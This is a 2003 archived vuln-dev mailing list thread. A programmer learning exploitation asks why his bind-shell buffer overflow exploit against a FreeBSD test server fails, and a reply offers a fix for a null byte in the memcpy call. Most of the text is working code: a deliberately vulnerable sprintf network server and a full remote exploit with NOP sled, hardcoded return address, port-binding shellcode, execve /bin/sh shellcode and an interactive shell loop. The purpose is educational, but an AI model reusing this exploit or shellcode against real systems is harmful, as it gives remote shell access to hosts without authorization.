Vulnerability Development mailing list archives
Re: sample buffer overflow exploit problem
From: Ganbold <ganbold () micom mng net>
Date: Sun, 28 Sep 2003 14:56:02 +0900
Thanks, Yes, that's true, I can avoid string end null byte just as you said. Is there any other problem in my code? Ganbold At 04:09 AM 9/28/2003 +0300, you wrote:
Hi. I read your sample exploit code >//copying shellcode into buffer >memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode)); > >// the previous statement causes a unintential Nullbyte at buffer[1000] >buffer[1000] = 0x90; You can avoid memcpy copying the string null terminator byte by simply decrementing the length to copy (3'rd paramter) by 1 like this: memcpy(buffer + 1001 - sizeof(shellcode) , shellcode, sizeof(shellcode) - 1); ----- Original Message ----- From: "Ganbold" <ganbold () micom mng net> To: <vuln-dev () securityfocus com> Sent: Saturday, September 27, 2003 10:54 AM Subject: sample buffer overflow exploit problem > Hi, > > I'm very new to buffer overflow exploit technics and my boss wants me to > thoroughly understand > how it works. I'm trying to exploit sample network server in FreeBSD 5.1 > for this purpose. > When I try to exploit using execve /bin/sh (shellcode1), it works and > launches the shell in the remote machine. > However when I try to use port binding shell code, it binds shell to the > port, but when I try to connect to > it, it just closes the connection. Also I can't connect to bind port after > sending buffer using following code snippets: > .............. > printf("[-] Connecting to bindshell...\n"); > remote.sin_family = AF_INET; > remote.sin_addr = *((struct in_addr *)host->h_addr); > remote.sin_port = htons(12345); > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) > { > close(s); > fprintf(stderr, "Error: connect\n"); > return -1; > } > exec_sh(s); > ............... > > I appreciate if somebody give me some help to solve this test problem. > Is there anywhere I can find detailed explanation about buffer overflows > and working sample network exploits? > Is there anyway I can generate shellcodes in FreeBSD? > > I attached my sample server code and exploit code. > > thanks in advance, > > Ganbold Ts, > > senior programmer, > Micom Co., Ltd > Ulaanbaatar, > Mongolia > > > > Following is network server code: > -------------------------------------------------------------------------- ------------------------------------------------------ > #include <stdio.h> > #include <netinet/in.h> > #include <netdb.h> > #include <sys/socket.h> > #include <sys/types.h> > #include <errno.h> > > #define BUFFER_SIZE 1024 > #define NAME_SIZE 2048 > > int handle(int c) > { > char buffer[BUFFER_SIZE], name[NAME_SIZE]; > int bytes; > strcpy(buffer, "Your name?: "); > bytes = send(c, buffer, strlen(buffer), 0); > if (bytes == -1) > return -1; > bytes = recv(c, name, sizeof(name), 0); > if (bytes == -1) > return -1; > name[bytes - 1] = '\0'; > sprintf(buffer, "Hello %s, nice to meet you!\r\n", name); > bytes = send(c, buffer, strlen(buffer), 0); > if (bytes == -1) > return -1; > return 0; > } > > > int main(int argc, char *argv[]) > { > int s, c, cli_size; > struct sockaddr_in srv, cli; > if (argc != 2) > { > fprintf(stderr, "usage: %s port\n", argv[0]); > return 1; > } > s = socket(AF_INET, SOCK_STREAM, 0); > if (s == -1) > { > perror("socket() failed"); > return 2; > } > srv.sin_addr.s_addr = INADDR_ANY; > srv.sin_port = htons( (unsigned short int) atol(argv[1])); > srv.sin_family = AF_INET; > if (bind(s, &srv, sizeof(srv)) == -1) > { > perror("bind() failed"); > return 3; > } > if (listen(s, 3) == -1) > { > perror("listen() failed"); > return 4; > } > for(;;) > { > c = accept(s, &cli, &cli_size); > if (c == -1) > { > perror("accept() failed"); > return 5; > } > fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr)); > if (handle(c) == -1) > fprintf(stderr, "%s: handle() failed", argv[0]); > close(c); > } > return 0; > } > -------------------------------------------------------------------------- ------------------------------------------------------ > > Following is the sample exploit code: > -------------------------------------------------------------------------- ------------------------------------------------------ > #include <stdio.h> > #include <netinet/in.h> > #include <netdb.h> > #include <sys/socket.h> > #include <sys/types.h> > #include <errno.h> > #include <unistd.h> > > /* > * FreeBSD shellcode - binds /bin/sh to a port 12345 > * > * Claes M. Nyberg 20020619 > * > * <cmn () darklab org>, <md0claes () mdstud chalmers se> > */ > char shellcode[] > = > /* port _______*/ > "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39" > "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd" > "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83" > "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53" > "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50" > "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" > "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0" > "\x40\x50\x50\xcd\x80"; > > /* > * FreeBSD shellcode - execve /bin/sh > * > * Claes M. Nyberg 20020120 > * > * <cmn () darklab org>, <md0claes () mdstud chalmers se> > */ > char shellcode1[] = > "\x31\xc0" /* xorl %eax, %eax */ > "\x50" /* pushl %eax */ > "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ > "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ > "\x89\xe3" /* movl %esp, %ebx */ > "\x50" /* pushl %eax */ > "\x53" /* pushl %ebx */ > "\x89\xe2" /* movl %esp, %edx */ > "\x50" /* pushl %eax */ > "\x52" /* pushl %edx */ > "\x53" /* pushl %ebx */ > "\x50" /* pushl %eax */ > "\xb0\x3b" /* movb $0x3b, %al */ > "\xcd\x80" /* int $0x80 */ > "\x31\xc0" /* xorl %eax, %eax */ > "\x40" /* inc %eax */ > "\x50" /* pushl %eax */ > "\x50" /* pushl %eax */ > "\xcd\x80"; /* int $0x80 */ > > #define RET 0xbfbffa48 > > int exec_sh(int sockfd) > { > char snd[4096],rcv[4096]; > fd_set rset; > while(1) > { > FD_ZERO(&rset); > FD_SET(fileno(stdin),&rset); > FD_SET(sockfd,&rset); > select(255,&rset,NULL,NULL,NULL); > if(FD_ISSET(fileno(stdin),&rset)) > { > memset(snd,0,sizeof(snd)); > fgets(snd,sizeof(snd),stdin); > write(sockfd,snd,strlen(snd)); > } > if(FD_ISSET(sockfd,&rset)) > { > memset(rcv,0,sizeof(rcv)); > if(read(sockfd,rcv,sizeof(rcv))<=0) > exit(0); > fputs(rcv,stdout); > } > } > } > > int main(int argc, char *argv[]) { > > char buffer[1064]; > int s,t, i, size; > struct sockaddr_in remote; > struct hostent *host; > > if(argc != 3) { > printf("Usage: %s target-ip port\n", argv[0]); > return -1; > } > > // filling buffer with NOPs > memset(buffer, 0x90, 1064); > > //copying shellcode into buffer > memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode)); > > // the previous statement causes a unintential Nullbyte at buffer[1000] > buffer[1000] = 0x90; > > // Copying the return address multiple times at the end of the buffer... > for(i=1022; i < 1059; i+=4) { > * ((int *) &buffer[i]) = RET; > } > > buffer[1063] = 0x0; > > //getting hostname > > host=gethostbyname(argv[1]); > if (host==NULL) > { > fprintf(stderr, "Unknown Host %s\n",argv[1]); > return -1; > } > > // creating socket... > s = socket(AF_INET, SOCK_STREAM, 0); > if (s < 0) > { > fprintf(stderr, "Error: Socket\n"); > return -1; > } > remote.sin_family = AF_INET; > remote.sin_addr = *((struct in_addr *)host->h_addr); > remote.sin_port = htons(atoi(argv[2])); > // connecting with destination host > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) > { > close(s); > fprintf(stderr, "Error: connect\n"); > return -1; > } > //sending exploit string > size = send(s, buffer, sizeof(buffer), 0); > if (size==-1) > { > close(s); > fprintf(stderr, "sending data failed\n"); > return -1; > } > /* > printf("[-] Connecting to bindshell...\n"); > remote.sin_family = AF_INET; > remote.sin_addr = *((struct in_addr *)host->h_addr); > remote.sin_port = htons(12345); > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) > { > close(s); > fprintf(stderr, "Error: connect\n"); > return -1; > } > exec_sh(s); > */ > // closing socket > close(s); > } > > -------------------------------------------------------------------------- ------------------------------------------------------ > > > >
Current thread:
- sample buffer overflow exploit problem Ganbold (Sep 27)
- Message not available
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Message not available
- Re: sample buffer overflow exploit problem upb (Sep 29)
- <Possible follow-ups>
- Re: sample buffer overflow exploit problem deepcode . (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem sohlow (Sep 29)
- Re: sample buffer overflow exploit problem Vade 79 (Sep 30)
- RE: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Gerardo Richarte (Sep 30)